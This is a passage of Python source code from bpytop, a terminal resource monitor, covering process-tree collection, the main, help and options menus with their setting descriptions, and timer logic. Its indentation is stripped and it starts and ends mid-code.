cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: str):
'''List all processess in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
pass
cont = False
name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
for s in search.split(","):
if s.strip() in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = True if depth > CONFIG.tree_depth else False
cls.collapsed[pid] = collapse
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd,
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key == "right" else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if mx >= pos["x1"] and mx <= pos["x2"] and my >= pos["y1"] and my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(1)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = True if cls.active else False
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Change current view mode, order full->proc->stat.",
"(F2, o)" : "Shows options.",
"(F1, h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up) (Down)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left) (Right)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f)" : "Input a string to filter processes with.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (T, t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (K, k)" : "Kill selected process with SIGKILL - 9.",
"Selected (I, i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if mx >= x and mx < x + w and my >= y and my < y + h + 3:
if pages and my == y and mx > x + 56 and mx < x + 61:
key = "up"
elif pages and my == y and mx > x + 63 and mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "h", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(1)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = True if cls.active else False
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
global ARG_MODE
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
option_items: Dict[str, List[str]] = {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"view_mode" : [
'Set bpytop view mode.',
'',
'"full" for everything shown.',
'"proc" for cpu stats and processes.',
'"stat" for cpu, mem, disks and net stats shown.'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
'Sets the depth were the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to current themes',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
'If true and process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'
],
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Examples:',
'"%X" locale HH:MM:SS',
'"%H" 24h hour, "%I" 12h hour',
'"%M" minute, "%S" second',
'"%d" day, "%m" month, "%y" year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
'Set this to false if the menus is flickering',
'too much for a comfortable experience.'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be last folder in path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma.',
'Begin line with "exclude=" to change to exclude',
'filter.',
'Oterwise defaults to "most include" filter.',
'',
'Example: disks_filter="exclude=boot, home"'],
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"net_download" : [
'Fixed network graph download value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
'rescales down to 10KibiBytes at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"show_battery" : [
'Show battery stats.',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
'The init screen is purely cosmetical and',
'slows down start to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
}
option_len: int = len(option_items) * 2
sorting_i: int = CONFIG.sorting_options.index(CONFIG.proc_sorting)
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
view_mode_i: int = CONFIG.view_modes.index(CONFIG.view_mode)
color_i: int
while not cls.close:
key = ""
if cls.resized:
y = 9 if Term.height < option_len + 10 else Term.height // 2 - option_len // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = Term.height-2-y, 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = 1
selected_int = 0
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {sorting_i + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "view_mode":
counter = f' {view_mode_i + 1}/{len(CONFIG.view_modes)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "view_mode"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if mx > x and mx < x + w and my > y and my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and mx > x+11 and mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and mx > x+19 and mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = True if len(CONFIG.draw_clock) > 0 else False
if not Box.clock_on: Draw.clear("clock", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val) > 0:
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download", "net_upload", "draw_clock", "tree_depth"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = THEME.main_bg if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected == "view_mode":
if key == "left":
view_mode_i -= 1
if view_mode_i < 0: view_mode_i = len(CONFIG.view_modes) - 1
elif key == "right":
view_mode_i += 1
if view_mode_i > len(CONFIG.view_modes) - 1: view_mode_i = 0
CONFIG.view_mode = CONFIG.view_modes[view_mode_i]
Box.proc_mode = True if CONFIG.view_mode == "proc" else False
Box.stat_mode = True if CONFIG.view_mode == "stat" else False
if ARG_MODE:
ARG_MODE = ""
Draw.clear(saved=True)
Term.refresh(force=True)
cls.resized = False
elif key == "up":
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key == "down":
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key in ["mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key in ["mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(1)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
if cls.timestamp + (CONFIG.update_ms / 1000) > time():
return True
else:
return False
@classmethod
def left(cls) -> float:
return cls.timestamp + (CONFIG.update_ms / 1000) - time()
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
class UpdateChecker:
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
